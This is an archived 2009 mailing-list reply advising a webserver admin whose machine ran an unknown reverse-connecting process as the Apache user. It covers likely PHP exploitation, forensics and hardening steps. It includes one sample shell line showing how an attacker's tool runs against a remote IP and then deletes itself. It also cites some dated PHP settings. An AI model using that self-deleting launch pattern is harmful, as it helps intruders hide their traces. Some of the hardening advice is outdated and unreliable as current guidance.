Security Basics mailing list archives
Re: found clues about a security issue in a web server
From: Aarón Mizrachi <unmanarc () gmail com>
Date: Wed, 18 Mar 2009 02:51:29 -0430
On Domingo 15 Marzo 2009 11:40:22 kazabe escribió:
Hi. In the latest week my internet connection was frozen. After discard ISP and routing problems, i see this process in my webserver (stored behind my router): www-data 20580 00 00 815 355 ? S 07:16 6:01 ./s 86.23.114.12 80 that process was using all the bandwith (the address displayed is a remote IP, without any relationship with us). After kill that process, the internet service is normal again. The router and the webserver are running under Debian Lenny. The web server is not remotely accesible. all the administration is phisically in the PC. The webserver dont have any remote access (dont have ftp, or ssh, or telnet. Nothing). I try to found that "./s" but i cant found it yet. How can i detect how was inyected that script?
Hi, sounds like Scripting bad code explotation (PHP, JSP, Perl, etc...) Why? running ./s as www-data sounds like reverse connection started with apache user, that are probable to happen on scripting explotation attacks. More if you say that the only internet-open port are the webserver. ------------------------------------------------------
The webserver is only to publish a website related with company internal process (but is published to Internet, by a port forwarding from the router). That website use php and mysql. What can i check to solve that security issue? Thanks in advance.
That security issue happen's by a bad-programmed script code, first of all, what script code are installed on your server (php, jsp, mono asp.net, perl, cgi-bin, etc)? If it's a CMS, are properly updated? Each language are a bit different from each other..., Ex. on php, "safe_mode on" are mandatory on security matter, "url_fopen off" are mandatory to prevent RFI... Don't use or activate anything that you dont really use... if you dont use cgi-bin, DISABLE IT. ------------------------------------------------- location of s. check on /tmp check on www-data writeable dirs but remember, s could be deleted when you kill him, a simple bash sentence demostrate that: (./s 86.23.114.12 80; rm -rf ./s) Then when you kill s, the rm -rf act... and bye bye to s. --------------------------------------------------- Scope: That ps line prove that a hacker have the REMOTE control of a user-shell on your server, that is sufficiently bad, you could have trojans/rootkits. (Dont even think about your firewalls, doesn't protect you on reverse connections) More worse scenario involves root compromise and other system's compromise over network using mitm, etc... --------------------------------------------------- Sugerency: - Down your portal - Check your apache logs (/var/log/www or similar). - Check for rootkits - Check for - Create a hard-drive image (http://dcfldd.sourceforge.net/) - Reinstall (please check if your linux distro are currently mantained, its so important...) - Do a server security hardening - Check for updates and enable auto-updates - Audit your code (PHP or something), update everything hand-updeteable like CMS, etc - Audit your FS permisology (chown and chmod are your best friend) - Up your portal - Weekly reboot your server (uptime are the best enemy of security) ;-) ------------------------------------------------------------------------ This list is sponsored by: InfoSec Institute Find the source of cybercrime! Almost every crime today involves a computer or mobile device. Learn how to become a Computer Forensics Examiner in InfoSec Institute's hands-on Computer Forensics Course. Up to three industry recognized certs available, online computer forensics training available. http://www.infosecinstitute.com/courses/computer_forensics_training.html ------------------------------------------------------------------------
Current thread:
- found clues about a security issue in a web server kazabe (Mar 16)
- Re: found clues about a security issue in a web server Aarón Mizrachi (Mar 19)